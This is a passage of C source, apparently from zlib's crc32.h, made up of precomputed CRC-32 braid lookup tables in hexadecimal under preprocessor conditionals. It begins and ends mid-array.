0xb5ae7e4d, 0x9e832d8e, 0x87981ccf, 0x4ac21251, 0x53d92310, 0x78f470d3, 0x61ef4192, 0x2eaed755, 0x37b5e614, 0x1c98b5d7, 0x05838496, 0x821b9859, 0x9b00a918, 0xb02dfadb, 0xa936cb9a, 0xe6775d5d, 0xff6c6c1c, 0xd4413fdf, 0xcd5a0e9e, 0x958424a2, 0x8c9f15e3, 0xa7b24620, 0xbea97761, 0xf1e8e1a6, 0xe8f3d0e7, 0xc3de8324, 0xdac5b265, 0x5d5daeaa, 0x44469feb, 0x6f6bcc28, 0x7670fd69, 0x39316bae, 0x202a5aef, 0x0b07092c, 0x121c386d, 0xdf4636f3, 0xc65d07b2, 0xed705471, 0xf46b6530, 0xbb2af3f7, 0xa231c2b6, 0x891c9175, 0x9007a034, 0x179fbcfb, 0x0e848dba, 0x25a9de79, 0x3cb2ef38, 0x73f379ff, 0x6ae848be, 0x41c51b7d, 0x58de2a3c, 0xf0794f05, 0xe9627e44, 0xc24f2d87, 0xdb541cc6, 0x94158a01, 0x8d0ebb40, 0xa623e883, 0xbf38d9c2, 0x38a0c50d, 0x21bbf44c, 0x0a96a78f, 0x138d96ce, 0x5ccc0009, 0x45d73148, 0x6efa628b, 0x77e153ca, 0xbabb5d54, 0xa3a06c15, 0x888d3fd6, 0x91960e97, 0xded79850, 0xc7cca911, 0xece1fad2, 0xf5facb93, 0x7262d75c, 0x6b79e61d, 0x4054b5de, 0x594f849f, 0x160e1258, 0x0f152319, 0x243870da, 0x3d23419b, 0x65fd6ba7, 0x7ce65ae6, 0x57cb0925, 0x4ed03864, 0x0191aea3, 0x188a9fe2, 0x33a7cc21, 0x2abcfd60, 0xad24e1af, 0xb43fd0ee, 0x9f12832d, 0x8609b26c, 0xc94824ab, 0xd05315ea, 0xfb7e4629, 0xe2657768, 0x2f3f79f6, 0x362448b7, 0x1d091b74, 0x04122a35, 0x4b53bcf2, 0x52488db3, 0x7965de70, 0x607eef31, 0xe7e6f3fe, 0xfefdc2bf, 0xd5d0917c, 0xcccba03d, 0x838a36fa, 0x9a9107bb, 0xb1bc5478, 0xa8a76539, 0x3b83984b, 0x2298a90a, 0x09b5fac9, 0x10aecb88, 0x5fef5d4f, 0x46f46c0e, 0x6dd93fcd, 0x74c20e8c, 0xf35a1243, 0xea412302, 0xc16c70c1, 0xd8774180, 0x9736d747, 0x8e2de606, 0xa500b5c5, 0xbc1b8484, 0x71418a1a, 0x685abb5b, 0x4377e898, 0x5a6cd9d9, 0x152d4f1e, 0x0c367e5f, 0x271b2d9c, 0x3e001cdd, 0xb9980012, 0xa0833153, 0x8bae6290, 0x92b553d1, 0xddf4c516, 0xc4eff457, 0xefc2a794, 0xf6d996d5, 0xae07bce9, 0xb71c8da8, 0x9c31de6b, 0x852aef2a, 0xca6b79ed, 0xd37048ac, 0xf85d1b6f, 0xe1462a2e, 0x66de36e1, 0x7fc507a0, 0x54e85463, 0x4df36522, 0x02b2f3e5, 0x1ba9c2a4, 0x30849167, 0x299fa026, 0xe4c5aeb8, 0xfdde9ff9, 0xd6f3cc3a, 
0xcfe8fd7b, 0x80a96bbc, 0x99b25afd, 0xb29f093e, 0xab84387f, 0x2c1c24b0, 0x350715f1, 0x1e2a4632, 0x07317773, 0x4870e1b4, 0x516bd0f5, 0x7a468336, 0x635db277, 0xcbfad74e, 0xd2e1e60f, 0xf9ccb5cc, 0xe0d7848d, 0xaf96124a, 0xb68d230b, 0x9da070c8, 0x84bb4189, 0x03235d46, 0x1a386c07, 0x31153fc4, 0x280e0e85, 0x674f9842, 0x7e54a903, 0x5579fac0, 0x4c62cb81, 0x8138c51f, 0x9823f45e, 0xb30ea79d, 0xaa1596dc, 0xe554001b, 0xfc4f315a, 0xd7626299, 0xce7953d8, 0x49e14f17, 0x50fa7e56, 0x7bd72d95, 0x62cc1cd4, 0x2d8d8a13, 0x3496bb52, 0x1fbbe891, 0x06a0d9d0, 0x5e7ef3ec, 0x4765c2ad, 0x6c48916e, 0x7553a02f, 0x3a1236e8, 0x230907a9, 0x0824546a, 0x113f652b, 0x96a779e4, 0x8fbc48a5, 0xa4911b66, 0xbd8a2a27, 0xf2cbbce0, 0xebd08da1, 0xc0fdde62, 0xd9e6ef23, 0x14bce1bd, 0x0da7d0fc, 0x268a833f, 0x3f91b27e, 0x70d024b9, 0x69cb15f8, 0x42e6463b, 0x5bfd777a, 0xdc656bb5, 0xc57e5af4, 0xee530937, 0xf7483876, 0xb809aeb1, 0xa1129ff0, 0x8a3fcc33, 0x9324fd72}, {0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 
0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 
0x2d02ef8d}};
local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x96300777, 0x2c610eee, 0xba510999, 0x19c46d07, 0x8ff46a70, 0x35a563e9, 0xa395649e, 0x3288db0e, 0xa4b8dc79, 0x1ee9d5e0, 0x88d9d297, 0x2b4cb609, 0xbd7cb17e, 0x072db8e7, 0x911dbf90, 0x6410b71d, 0xf220b06a, 0x4871b9f3, 0xde41be84, 0x7dd4da1a, 0xebe4dd6d, 0x51b5d4f4, 0xc785d383, 0x56986c13, 0xc0a86b64, 0x7af962fd, 0xecc9658a, 0x4f5c0114, 0xd96c0663, 0x633d0ffa, 0xf50d088d, 0xc8206e3b, 0x5e10694c, 0xe44160d5, 0x727167a2, 0xd1e4033c, 0x47d4044b, 0xfd850dd2, 0x6bb50aa5, 0xfaa8b535, 0x6c98b242, 0xd6c9bbdb, 0x40f9bcac, 0xe36cd832, 0x755cdf45, 0xcf0dd6dc, 0x593dd1ab, 0xac30d926, 0x3a00de51, 0x8051d7c8, 0x1661d0bf, 0xb5f4b421, 0x23c4b356, 0x9995bacf, 0x0fa5bdb8, 0x9eb80228, 0x0888055f, 0xb2d90cc6, 0x24e90bb1, 0x877c6f2f, 0x114c6858, 0xab1d61c1, 0x3d2d66b6, 0x9041dc76, 0x0671db01, 0xbc20d298, 0x2a10d5ef, 0x8985b171, 0x1fb5b606, 0xa5e4bf9f, 0x33d4b8e8, 0xa2c90778, 0x34f9000f, 0x8ea80996, 0x18980ee1, 0xbb0d6a7f, 0x2d3d6d08, 0x976c6491, 0x015c63e6, 0xf4516b6b, 0x62616c1c, 0xd8306585, 0x4e0062f2, 0xed95066c, 0x7ba5011b, 0xc1f40882, 0x57c40ff5, 0xc6d9b065, 0x50e9b712, 0xeab8be8b, 0x7c88b9fc, 0xdf1ddd62, 0x492dda15, 0xf37cd38c, 0x654cd4fb, 0x5861b24d, 0xce51b53a, 0x7400bca3, 0xe230bbd4, 0x41a5df4a, 0xd795d83d, 0x6dc4d1a4, 0xfbf4d6d3, 0x6ae96943, 0xfcd96e34, 0x468867ad, 0xd0b860da, 0x732d0444, 0xe51d0333, 0x5f4c0aaa, 0xc97c0ddd, 0x3c710550, 0xaa410227, 0x10100bbe, 0x86200cc9, 0x25b56857, 0xb3856f20, 0x09d466b9, 0x9fe461ce, 0x0ef9de5e, 0x98c9d929, 0x2298d0b0, 0xb4a8d7c7, 0x173db359, 0x810db42e, 0x3b5cbdb7, 0xad6cbac0, 0x2083b8ed, 0xb6b3bf9a, 0x0ce2b603, 0x9ad2b174, 0x3947d5ea, 0xaf77d29d, 0x1526db04, 0x8316dc73, 0x120b63e3, 0x843b6494, 0x3e6a6d0d, 0xa85a6a7a, 0x0bcf0ee4, 0x9dff0993, 0x27ae000a, 0xb19e077d, 0x44930ff0, 0xd2a30887, 0x68f2011e, 0xfec20669, 0x5d5762f7, 0xcb676580, 0x71366c19, 0xe7066b6e, 0x761bd4fe, 0xe02bd389, 0x5a7ada10, 0xcc4add67, 0x6fdfb9f9, 0xf9efbe8e, 0x43beb717, 0xd58eb060, 
0xe8a3d6d6, 0x7e93d1a1, 0xc4c2d838, 0x52f2df4f, 0xf167bbd1, 0x6757bca6, 0xdd06b53f, 0x4b36b248, 0xda2b0dd8, 0x4c1b0aaf, 0xf64a0336, 0x607a0441, 0xc3ef60df, 0x55df67a8, 0xef8e6e31, 0x79be6946, 0x8cb361cb, 0x1a8366bc, 0xa0d26f25, 0x36e26852, 0x95770ccc, 0x03470bbb, 0xb9160222, 0x2f260555, 0xbe3bbac5, 0x280bbdb2, 0x925ab42b, 0x046ab35c, 0xa7ffd7c2, 0x31cfd0b5, 0x8b9ed92c, 0x1daede5b, 0xb0c2649b, 0x26f263ec, 0x9ca36a75, 0x0a936d02, 0xa906099c, 0x3f360eeb, 0x85670772, 0x13570005, 0x824abf95, 0x147ab8e2, 0xae2bb17b, 0x381bb60c, 0x9b8ed292, 0x0dbed5e5, 0xb7efdc7c, 0x21dfdb0b, 0xd4d2d386, 0x42e2d4f1, 0xf8b3dd68, 0x6e83da1f, 0xcd16be81, 0x5b26b9f6, 0xe177b06f, 0x7747b718, 0xe65a0888, 0x706a0fff, 0xca3b0666, 0x5c0b0111, 0xff9e658f, 0x69ae62f8, 0xd3ff6b61, 0x45cf6c16, 0x78e20aa0, 0xeed20dd7, 0x5483044e, 0xc2b30339, 0x612667a7, 0xf71660d0, 0x4d476949, 0xdb776e3e, 0x4a6ad1ae, 0xdc5ad6d9, 0x660bdf40, 0xf03bd837, 0x53aebca9, 0xc59ebbde, 0x7fcfb247, 0xe9ffb530, 0x1cf2bdbd, 0x8ac2baca, 0x3093b353, 0xa6a3b424, 0x0536d0ba, 0x9306d7cd, 0x2957de54, 0xbf67d923, 0x2e7a66b3, 0xb84a61c4, 0x021b685d, 0x942b6f2a, 0x37be0bb4, 0xa18e0cc3, 0x1bdf055a, 0x8def022d}, {0x00000000, 0x41311b19, 0x82623632, 0xc3532d2b, 0x04c56c64, 0x45f4777d, 0x86a75a56, 0xc796414f, 0x088ad9c8, 0x49bbc2d1, 0x8ae8effa, 0xcbd9f4e3, 0x0c4fb5ac, 0x4d7eaeb5, 0x8e2d839e, 0xcf1c9887, 0x5112c24a, 0x1023d953, 0xd370f478, 0x9241ef61, 0x55d7ae2e, 0x14e6b537, 0xd7b5981c, 0x96848305, 0x59981b82, 0x18a9009b, 0xdbfa2db0, 0x9acb36a9, 0x5d5d77e6, 0x1c6c6cff, 0xdf3f41d4, 0x9e0e5acd, 0xa2248495, 0xe3159f8c, 0x2046b2a7, 0x6177a9be, 0xa6e1e8f1, 0xe7d0f3e8, 0x2483dec3, 0x65b2c5da, 0xaaae5d5d, 0xeb9f4644, 0x28cc6b6f, 0x69fd7076, 0xae6b3139, 0xef5a2a20, 0x2c09070b, 0x6d381c12, 0xf33646df, 0xb2075dc6, 0x715470ed, 0x30656bf4, 0xf7f32abb, 0xb6c231a2, 0x75911c89, 0x34a00790, 0xfbbc9f17, 0xba8d840e, 0x79dea925, 0x38efb23c, 0xff79f373, 0xbe48e86a, 0x7d1bc541, 0x3c2ade58, 0x054f79f0, 0x447e62e9, 0x872d4fc2, 0xc61c54db, 0x018a1594, 0x40bb0e8d, 
0x83e823a6, 0xc2d938bf, 0x0dc5a038, 0x4cf4bb21, 0x8fa7960a, 0xce968d13, 0x0900cc5c, 0x4831d745, 0x8b62fa6e, 0xca53e177, 0x545dbbba, 0x156ca0a3, 0xd63f8d88, 0x970e9691, 0x5098d7de, 0x11a9ccc7, 0xd2fae1ec, 0x93cbfaf5, 0x5cd76272, 0x1de6796b, 0xdeb55440, 0x9f844f59, 0x58120e16, 0x1923150f, 0xda703824, 0x9b41233d, 0xa76bfd65, 0xe65ae67c, 0x2509cb57, 0x6438d04e, 0xa3ae9101, 0xe29f8a18, 0x21cca733, 0x60fdbc2a, 0xafe124ad, 0xeed03fb4, 0x2d83129f, 0x6cb20986, 0xab2448c9, 0xea1553d0, 0x29467efb, 0x687765e2, 0xf6793f2f, 0xb7482436, 0x741b091d, 0x352a1204, 0xf2bc534b, 0xb38d4852, 0x70de6579, 0x31ef7e60, 0xfef3e6e7, 0xbfc2fdfe, 0x7c91d0d5, 0x3da0cbcc, 0xfa368a83, 0xbb07919a, 0x7854bcb1, 0x3965a7a8, 0x4b98833b, 0x0aa99822, 0xc9fab509, 0x88cbae10, 0x4f5def5f, 0x0e6cf446, 0xcd3fd96d, 0x8c0ec274, 0x43125af3, 0x022341ea, 0xc1706cc1, 0x804177d8, 0x47d73697, 0x06e62d8e, 0xc5b500a5, 0x84841bbc, 0x1a8a4171, 0x5bbb5a68, 0x98e87743, 0xd9d96c5a, 0x1e4f2d15, 0x5f7e360c, 0x9c2d1b27, 0xdd1c003e, 0x120098b9, 0x533183a0, 0x9062ae8b, 0xd153b592, 0x16c5f4dd, 0x57f4efc4, 0x94a7c2ef, 0xd596d9f6, 0xe9bc07ae, 0xa88d1cb7, 0x6bde319c, 0x2aef2a85, 0xed796bca, 0xac4870d3, 0x6f1b5df8, 0x2e2a46e1, 0xe136de66, 0xa007c57f, 0x6354e854, 0x2265f34d, 0xe5f3b202, 0xa4c2a91b, 0x67918430, 0x26a09f29, 0xb8aec5e4, 0xf99fdefd, 0x3accf3d6, 0x7bfde8cf, 0xbc6ba980, 0xfd5ab299, 0x3e099fb2, 0x7f3884ab, 0xb0241c2c, 0xf1150735, 0x32462a1e, 0x73773107, 0xb4e17048, 0xf5d06b51, 0x3683467a, 0x77b25d63, 0x4ed7facb, 0x0fe6e1d2, 0xccb5ccf9, 0x8d84d7e0, 0x4a1296af, 0x0b238db6, 0xc870a09d, 0x8941bb84, 0x465d2303, 0x076c381a, 0xc43f1531, 0x850e0e28, 0x42984f67, 0x03a9547e, 0xc0fa7955, 0x81cb624c, 0x1fc53881, 0x5ef42398, 0x9da70eb3, 0xdc9615aa, 0x1b0054e5, 0x5a314ffc, 0x996262d7, 0xd85379ce, 0x174fe149, 0x567efa50, 0x952dd77b, 0xd41ccc62, 0x138a8d2d, 0x52bb9634, 0x91e8bb1f, 0xd0d9a006, 0xecf37e5e, 0xadc26547, 0x6e91486c, 0x2fa05375, 0xe836123a, 0xa9070923, 0x6a542408, 0x2b653f11, 0xe479a796, 0xa548bc8f, 0x661b91a4, 0x272a8abd, 
0xe0bccbf2, 0xa18dd0eb, 0x62defdc0, 0x23efe6d9, 0xbde1bc14, 0xfcd0a70d, 0x3f838a26, 0x7eb2913f, 0xb924d070, 0xf815cb69, 0x3b46e642, 0x7a77fd5b, 0xb56b65dc, 0xf45a7ec5, 0x370953ee, 0x763848f7, 0xb1ae09b8, 0xf09f12a1, 0x33cc3f8a, 0x72fd2493}, {0x00000000, 0x376ac201, 0x6ed48403, 0x59be4602, 0xdca80907, 0xebc2cb06, 0xb27c8d04, 0x85164f05, 0xb851130e, 0x8f3bd10f, 0xd685970d, 0xe1ef550c, 0x64f91a09, 0x5393d808, 0x0a2d9e0a, 0x3d475c0b, 0x70a3261c, 0x47c9e41d, 0x1e77a21f, 0x291d601e, 0xac0b2f1b, 0x9b61ed1a, 0xc2dfab18, 0xf5b56919, 0xc8f23512, 0xff98f713, 0xa626b111, 0x914c7310, 0x145a3c15, 0x2330fe14, 0x7a8eb816, 0x4de47a17, 0xe0464d38, 0xd72c8f39, 0x8e92c93b, 0xb9f80b3a, 0x3cee443f, 0x0b84863e, 0x523ac03c, 0x6550023d, 0x58175e36, 0x6f7d9c37, 0x36c3da35, 0x01a91834, 0x84bf5731, 0xb3d59530, 0xea6bd332, 0xdd011133, 0x90e56b24, 0xa78fa925, 0xfe31ef27, 0xc95b2d26, 0x4c4d6223, 0x7b27a022, 0x2299e620, 0x15f32421, 0x28b4782a, 0x1fdeba2b, 0x4660fc29, 0x710a3e28, 0xf41c712d, 0xc376b32c, 0x9ac8f52e, 0xada2372f, 0xc08d9a70, 0xf7e75871, 0xae591e73, 0x9933dc72, 0x1c259377, 0x2b4f5176, 0x72f11774, 0x459bd575, 0x78dc897e, 0x4fb64b7f, 0x16080d7d, 0x2162cf7c, 0xa4748079, 0x931e4278, 0xcaa0047a, 0xfdcac67b, 0xb02ebc6c, 0x87447e6d, 0xdefa386f, 0xe990fa6e, 0x6c86b56b, 0x5bec776a, 0x02523168, 0x3538f369, 0x087faf62, 0x3f156d63, 0x66ab2b61, 0x51c1e960, 0xd4d7a665, 0xe3bd6464, 0xba032266, 0x8d69e067, 0x20cbd748, 0x17a11549, 0x4e1f534b, 0x7975914a, 0xfc63de4f, 0xcb091c4e, 0x92b75a4c, 0xa5dd984d, 0x989ac446, 0xaff00647, 0xf64e4045, 0xc1248244, 0x4432cd41, 0x73580f40, 0x2ae64942, 0x1d8c8b43, 0x5068f154, 0x67023355, 0x3ebc7557, 0x09d6b756, 0x8cc0f853, 0xbbaa3a52, 0xe2147c50, 0xd57ebe51, 0xe839e25a, 0xdf53205b, 0x86ed6659, 0xb187a458, 0x3491eb5d, 0x03fb295c, 0x5a456f5e, 0x6d2fad5f, 0x801b35e1, 0xb771f7e0, 0xeecfb1e2, 0xd9a573e3, 0x5cb33ce6, 0x6bd9fee7, 0x3267b8e5, 0x050d7ae4, 0x384a26ef, 0x0f20e4ee, 0x569ea2ec, 0x61f460ed, 0xe4e22fe8, 0xd388ede9, 0x8a36abeb, 0xbd5c69ea, 0xf0b813fd, 0xc7d2d1fc, 
0x9e6c97fe, 0xa90655ff, 0x2c101afa, 0x1b7ad8fb, 0x42c49ef9, 0x75ae5cf8, 0x48e900f3, 0x7f83c2f2, 0x263d84f0, 0x115746f1, 0x944109f4, 0xa32bcbf5, 0xfa958df7, 0xcdff4ff6, 0x605d78d9, 0x5737bad8, 0x0e89fcda, 0x39e33edb, 0xbcf571de, 0x8b9fb3df, 0xd221f5dd, 0xe54b37dc, 0xd80c6bd7, 0xef66a9d6, 0xb6d8efd4, 0x81b22dd5, 0x04a462d0, 0x33cea0d1, 0x6a70e6d3, 0x5d1a24d2, 0x10fe5ec5, 0x27949cc4, 0x7e2adac6, 0x494018c7, 0xcc5657c2, 0xfb3c95c3, 0xa282d3c1, 0x95e811c0, 0xa8af4dcb, 0x9fc58fca, 0xc67bc9c8, 0xf1110bc9, 0x740744cc, 0x436d86cd, 0x1ad3c0cf, 0x2db902ce, 0x4096af91, 0x77fc6d90, 0x2e422b92, 0x1928e993, 0x9c3ea696, 0xab546497, 0xf2ea2295, 0xc580e094, 0xf8c7bc9f, 0xcfad7e9e, 0x9613389c, 0xa179fa9d, 0x246fb598, 0x13057799, 0x4abb319b, 0x7dd1f39a, 0x3035898d, 0x075f4b8c, 0x5ee10d8e, 0x698bcf8f, 0xec9d808a, 0xdbf7428b, 0x82490489, 0xb523c688, 0x88649a83, 0xbf0e5882, 0xe6b01e80, 0xd1dadc81, 0x54cc9384, 0x63a65185, 0x3a181787, 0x0d72d586, 0xa0d0e2a9, 0x97ba20a8, 0xce0466aa, 0xf96ea4ab, 0x7c78ebae, 0x4b1229af, 0x12ac6fad, 0x25c6adac, 0x1881f1a7, 0x2feb33a6, 0x765575a4, 0x413fb7a5, 0xc429f8a0, 0xf3433aa1, 0xaafd7ca3, 0x9d97bea2, 0xd073c4b5, 0xe71906b4, 0xbea740b6, 0x89cd82b7, 0x0cdbcdb2, 0x3bb10fb3, 0x620f49b1, 0x55658bb0, 0x6822d7bb, 0x5f4815ba, 0x06f653b8, 0x319c91b9, 0xb48adebc, 0x83e01cbd, 0xda5e5abf, 0xed3498be}, {0x00000000, 0x6567bcb8, 0x8bc809aa, 0xeeafb512, 0x5797628f, 0x32f0de37, 0xdc5f6b25, 0xb938d79d, 0xef28b4c5, 0x8a4f087d, 0x64e0bd6f, 0x018701d7, 0xb8bfd64a, 0xddd86af2, 0x3377dfe0, 0x56106358, 0x9f571950, 0xfa30a5e8, 0x149f10fa, 0x71f8ac42, 0xc8c07bdf, 0xada7c767, 0x43087275, 0x266fcecd, 0x707fad95, 0x1518112d, 0xfbb7a43f, 0x9ed01887, 0x27e8cf1a, 0x428f73a2, 0xac20c6b0, 0xc9477a08, 0x3eaf32a0, 0x5bc88e18, 0xb5673b0a, 0xd00087b2, 0x6938502f, 0x0c5fec97, 0xe2f05985, 0x8797e53d, 0xd1878665, 0xb4e03add, 0x5a4f8fcf, 0x3f283377, 0x8610e4ea, 0xe3775852, 0x0dd8ed40, 0x68bf51f8, 0xa1f82bf0, 0xc49f9748, 0x2a30225a, 0x4f579ee2, 0xf66f497f, 0x9308f5c7, 0x7da740d5, 0x18c0fc6d, 
0x4ed09f35, 0x2bb7238d, 0xc518969f, 0xa07f2a27, 0x1947fdba, 0x7c204102, 0x928ff410, 0xf7e848a8, 0x3d58149b, 0x583fa823, 0xb6901d31, 0xd3f7a189, 0x6acf7614, 0x0fa8caac, 0xe1077fbe, 0x8460c306, 0xd270a05e, 0xb7171ce6, 0x59b8a9f4, 0x3cdf154c, 0x85e7c2d1, 0xe0807e69, 0x0e2fcb7b, 0x6b4877c3, 0xa20f0dcb, 0xc768b173, 0x29c70461, 0x4ca0b8d9, 0xf5986f44, 0x90ffd3fc, 0x7e5066ee, 0x1b37da56, 0x4d27b90e, 0x284005b6, 0xc6efb0a4, 0xa3880c1c, 0x1ab0db81, 0x7fd76739, 0x9178d22b, 0xf41f6e93, 0x03f7263b, 0x66909a83, 0x883f2f91, 0xed589329, 0x546044b4, 0x3107f80c, 0xdfa84d1e, 0xbacff1a6, 0xecdf92fe, 0x89b82e46, 0x67179b54, 0x027027ec, 0xbb48f071, 0xde2f4cc9, 0x3080f9db, 0x55e74563, 0x9ca03f6b, 0xf9c783d3, 0x176836c1, 0x720f8a79, 0xcb375de4, 0xae50e15c, 0x40ff544e, 0x2598e8f6, 0x73888bae, 0x16ef3716, 0xf8408204, 0x9d273ebc, 0x241fe921, 0x41785599, 0xafd7e08b, 0xcab05c33, 0x3bb659ed, 0x5ed1e555, 0xb07e5047, 0xd519ecff, 0x6c213b62, 0x094687da, 0xe7e932c8, 0x828e8e70, 0xd49eed28, 0xb1f95190, 0x5f56e482, 0x3a31583a, 0x83098fa7, 0xe66e331f, 0x08c1860d, 0x6da63ab5, 0xa4e140bd, 0xc186fc05, 0x2f294917, 0x4a4ef5af, 0xf3762232, 0x96119e8a, 0x78be2b98, 0x1dd99720, 0x4bc9f478, 0x2eae48c0, 0xc001fdd2, 0xa566416a, 0x1c5e96f7, 0x79392a4f, 0x97969f5d, 0xf2f123e5, 0x05196b4d, 0x607ed7f5, 0x8ed162e7, 0xebb6de5f, 0x528e09c2, 0x37e9b57a, 0xd9460068, 0xbc21bcd0, 0xea31df88, 0x8f566330, 0x61f9d622, 0x049e6a9a, 0xbda6bd07, 0xd8c101bf, 0x366eb4ad, 0x53090815, 0x9a4e721d, 0xff29cea5, 0x11867bb7, 0x74e1c70f, 0xcdd91092, 0xa8beac2a, 0x46111938, 0x2376a580, 0x7566c6d8, 0x10017a60, 0xfeaecf72, 0x9bc973ca, 0x22f1a457, 0x479618ef, 0xa939adfd, 0xcc5e1145, 0x06ee4d76, 0x6389f1ce, 0x8d2644dc, 0xe841f864, 0x51792ff9, 0x341e9341, 0xdab12653, 0xbfd69aeb, 0xe9c6f9b3, 0x8ca1450b, 0x620ef019, 0x07694ca1, 0xbe519b3c, 0xdb362784, 0x35999296, 0x50fe2e2e, 0x99b95426, 0xfcdee89e, 0x12715d8c, 0x7716e134, 0xce2e36a9, 0xab498a11, 0x45e63f03, 0x208183bb, 0x7691e0e3, 0x13f65c5b, 0xfd59e949, 0x983e55f1, 0x2106826c, 0x44613ed4, 
0xaace8bc6, 0xcfa9377e, 0x38417fd6, 0x5d26c36e, 0xb389767c, 0xd6eecac4, 0x6fd61d59, 0x0ab1a1e1, 0xe41e14f3, 0x8179a84b, 0xd769cb13, 0xb20e77ab, 0x5ca1c2b9, 0x39c67e01, 0x80fea99c, 0xe5991524, 0x0b36a036, 0x6e511c8e, 0xa7166686, 0xc271da3e, 0x2cde6f2c, 0x49b9d394, 0xf0810409, 0x95e6b8b1, 0x7b490da3, 0x1e2eb11b, 0x483ed243, 0x2d596efb, 0xc3f6dbe9, 0xa6916751, 0x1fa9b0cc, 0x7ace0c74, 0x9461b966, 0xf10605de}}; #endif #endif #if N == 2 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xae689191, 0x87a02563, 0x29c8b4f2, 0xd4314c87, 0x7a59dd16, 0x539169e4, 0xfdf9f875, 0x73139f4f, 0xdd7b0ede, 0xf4b3ba2c, 0x5adb2bbd, 0xa722d3c8, 0x094a4259, 0x2082f6ab, 0x8eea673a, 0xe6273e9e, 0x484faf0f, 0x61871bfd, 0xcfef8a6c, 0x32167219, 0x9c7ee388, 0xb5b6577a, 0x1bdec6eb, 0x9534a1d1, 0x3b5c3040, 0x129484b2, 0xbcfc1523, 0x4105ed56, 0xef6d7cc7, 0xc6a5c835, 0x68cd59a4, 0x173f7b7d, 0xb957eaec, 0x909f5e1e, 0x3ef7cf8f, 0xc30e37fa, 0x6d66a66b, 0x44ae1299, 0xeac68308, 0x642ce432, 0xca4475a3, 0xe38cc151, 0x4de450c0, 0xb01da8b5, 0x1e753924, 0x37bd8dd6, 0x99d51c47, 0xf11845e3, 0x5f70d472, 0x76b86080, 0xd8d0f111, 